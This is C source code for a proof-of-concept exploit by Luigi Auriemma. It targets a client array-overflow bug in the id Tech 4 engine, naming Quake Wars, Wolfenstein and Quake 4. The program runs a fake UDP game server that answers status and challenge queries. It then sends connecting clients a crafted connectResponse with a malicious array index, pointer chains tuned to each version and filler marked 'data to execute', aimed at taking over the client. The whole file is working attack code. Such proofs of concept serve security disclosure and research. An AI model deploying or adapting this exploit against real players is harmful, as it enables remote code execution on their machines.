/*
  by Luigi Auriemma
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#include "show_dump.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define strictmp    strcasecmp
    #define stristr     strcasestr
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        27733   // default for ETQW
#define BUFFSZ      32768   // max used by new versions, old versions use 16384

#define DEF_VALUE   0x44444444
typedef struct {
    int offset; // offset of the packet "\xff\xffconnectResponse..." in memory
    int esi;    // or ebx, it's the address of the structure usually static
    int add;    // constant
    int size;   // constant
    int proto;
} settings_t;
settings_t settings[] = {
    { 0x023afd58, 0x1A76BA20, 0x00033778, 0x610c, 1 },  // ETQW 1.5
    { 0x0236fd58, 0x179304B8, 0x00033744, 0x610c, 1 },  // ETQW 1.4 demo
    { 0x022a7ee8, 0x1A7BA7E8, 0x00033824, 0x608c, 1 },  // Wolfenstein 1.3
    { DEF_VALUE,  0,          0,          1,      1 },  // default value for new engine
    { DEF_VALUE,  0,          0,          1,      0 },  // default value for old engine
    { 0,          0,          0,          0,     -1 }
};



int lame_array_guess(int offset, int esi, int add, int size, int *ret_diff);
int myrnd(void);
int putcc(u8 *dst, int chr, int len);
int putss(u8 *dst, u8 *par, u8 *val);
int putxx(u8 *data, u32 num, int bits);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            i,
            on      = 1,
            psz,
            len,
            test,
            tmp,
            offset;
    u16     port    = PORT;
    u8      *buff,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "id Tech 4 engine client array overflow "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <test> [port_to_bind(%u)]\n"
            "\n"
            "Test settings for the following games (only as examples):\n"
            " 1 = Enemy Territory: Quake Wars 1.5.12642.33243\n"
            " 2 = Enemy Territory: Quake Wars 1.4 (?) demo\n"
            " 3 = Wolfenstein 1.3.344285\n"
            " 4 = 0x%08x (old protocol, like Quake 4)\n"
            " 5 = 0x%08x (new protocol, like ETQW and Wolfenstein)\n"
            "\n"
            "Note that the above settings are only examples I have left after my tests so\n"
            "they couldn't work (here 100%% success), if in doubt use only 4 or 5\n"
            "\n", argv[0], port,
            DEF_VALUE, DEF_VALUE);
        exit(1);
    }
    test = atoi(argv[1]);
    if(argc > 2) port = atoi(argv[2]);

    test--;
    if(test < 0) test = 9999;
    for(i = 0; i < test; i++) {
        if(settings[i].proto < 0) {
            printf("\nError: invalid test setting (%d), will be used the default one\n", test);
            test = i - 1;
            break;
        }
    }

    peer.sin_addr.s_addr = INADDR_ANY;
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;
    psz                  = sizeof(struct sockaddr_in);

    printf("- bind UDP port %u\n", port);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on));
    if(bind(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in))
      < 0) std_err();

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    printf(
        "- now connect your test client to this computer and port %u\n"
        "  example from command-line:         game.exe +connect localhost:%hu\n"
        "  example from console (CTRL+ALT+~): connect localhost:%hu\n"
        "\n", port, port, port);
    printf("- clients:\n");
    for(;;) {
        len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
        if(len < 0) std_err();

        printf("  %s:%hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));
        show_dump(buff, len, stdout);
        fputc('\n', stdout);

        if((buff[0] == 0xff) && (buff[1] == 0xff)) {
            p = buff + 2;
            if(!stricmp(p, "getStatus")) {
                p += putss(p, "statusResponse", NULL);
                p += putxx(p, -1,       32);
                p += putxx(p, -1,       32);
                if(test == 1) { // ETQW demo
                    p += putxx(p, 19,   16);
                    p += putxx(p, 12,   16);
                } else {
                    p += putxx(p, 21,   16);
                    p += putxx(p, 10,   16);
                }
                p += putxx(p, 153,      32);
                p += putss(p, "ETQW Server", NULL);
                p += putxx(p, 24,       16);
                p += putss(p, "maps/valley.entities", NULL);
                p += putxx(p, 0,        16);
                p += putss(p, "si_teamDamage", "1");
                p += putss(p, "si_rules", "sdGameRulesCampain");
                p += putss(p, "si_teamForceBalance", "1");
                p += putss(p, "si_allowLateJoin", "1");
                p += putxx(p, 0,        32);
                p += putxx(p, -1,       32);
                p += putxx(p, 0,        32);
                p += putxx(p, 256,      32);

            } else if(!stricmp(p, "challenge")) {
                p += putss(p, "challengeResponse", NULL);
                p += putxx(p, myrnd(),  32);

                if(!settings[test].proto) {
                    p += putxx(p, 1,        8);
                    p += putxx(p, 24,       16);
                    // the client will create a folder with this name!
                    if(len == 16) {
                        p += putss(p, "base",   NULL);  // doom3
                    } else {
                        p += putss(p, "q4mp",   NULL);  // quake4
                    }
                } else {
                    p += putxx(p, 15996,    32);    // doom3 compatible?
                    p += putxx(p, 0,        32);
                    p += putxx(p, 0,        32);
                    p += putss(p, "", "");          // mods
                }

            } else if(!stricmp(p, "connect")) {
                offset = settings[test].offset + ((settings[test].offset) ? 0x24 : 0x20);
                tmp = lame_array_guess(
                    offset,
                    settings[test].esi,
                    settings[test].add,
                    settings[test].size,
                    &len);
                len -= 4;   // needed

                p += putss(p, "connectResponse", NULL);
                if(settings[test].proto) {
                    p += putxx(p, 0,    16);
                    p += putxx(p, 0,    16);
                }
                p += putxx(p, tmp,  32);    // the array bug! alternatively use 0x44444444
                if(!settings[test].proto) {
                    p += putxx(p, 0,    32);
                    p += putxx(p, 0,    32);
                    p += putxx(p, 0,    32);
                } else {
                    p += putxx(p, 0,    8);
                    p += putxx(p, 0,    32);
                    p += putxx(p, 0,    32);    // you get a crash if it's negative
                    p += putxx(p, 0,    8);     // only one bit
                }

                // yes I know that the following is lame but I needed only a quick example
                p += putcc(p, 'A', len);
                tmp = offset + len;
                for(i = 0; i < 6; i++) {                // pointer to pointer to pointer...
                    tmp += 4;
                    p += putxx(p, tmp,  32);
                }
                if(!settings[test].proto) {
                    p += putcc(p, 0xcc, 12000 - len);   // data to execute
                } else {
                    p += putcc(p, 0xcc, 30000 - len);   // data to execute
                }
                *p++ = 0;
                *p++ = 0;
                *p++ = '\n';
                *p++ = '\n';
                *p++ = '\n';

            } else if(!stricmp(p, "downloadRequest")) {
                i = *(u32 *)(p + 0x16);
                p += putss(p, "downloadInfo", NULL);
                p += putxx(p, i,  32);
                p += putxx(p, 1,    8);
                p += sprintf(p, "%s", "http://SERVER/valid_file.pk4") + 1;

            } else {
                /*
                // print
                p += putss(p, "print", NULL);
                p += putxx(p, -1,   32);
                p += putss(p, "message here", NULL);
                */
                continue;
            }

            show_dump(buff, p - buff, stdout);
            sendto(sd, buff, p - buff, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in));
        }
    }

    close(sd);
    return(0);
}



int lame_array_guess(int offset, int esi, int add, int size, int *ret_diff) {
    int     i,
            check;

    do {
        // do it
        i  = offset;
        i -= (size - 8);
        i -= add;
        i -= esi;
        i /= size;

        // verify
        check = i;              printf("- debug: %08x\n", check);
        check *= size;          printf("- debug: %08x\n", check);
        check += esi;           printf("- debug: %08x\n", check);
        check += add;           printf("- debug: %08x\n", check);
        check += (size - 8);    printf("- debug: %08x\n", check);
    } while(check < offset);

    printf("- debug: %08x %08x %08x\n", offset, check, i);
    if(ret_diff) *ret_diff = check - offset;
    return(i);
}



int myrnd(void) {
    static int  rnd = 0;

    if(!rnd) rnd = ~time(NULL);
    rnd = ((rnd * 0x343FD) + 0x269EC3) >> 1;
    return(rnd);
}



int putcc(u8 *dst, int chr, int len) {
    if(len < 0) return(0);
    memset(dst, chr, len);
    return(len);
}



int putss(u8 *dst, u8 *par, u8 *val) {
    int     plen = 0,
            vlen = 0;

    plen = strlen(par) + 1;
    memcpy(dst, par, plen);
    if(val) {
        vlen = strlen(val) + 1;
        memcpy(dst + plen, val, vlen);
    }
    return(plen + vlen);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        //data[i] = (num >> ((bytes - 1 - i) << 3));
        data[i] = (num >> (i << 3));
    }
    return(bytes);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


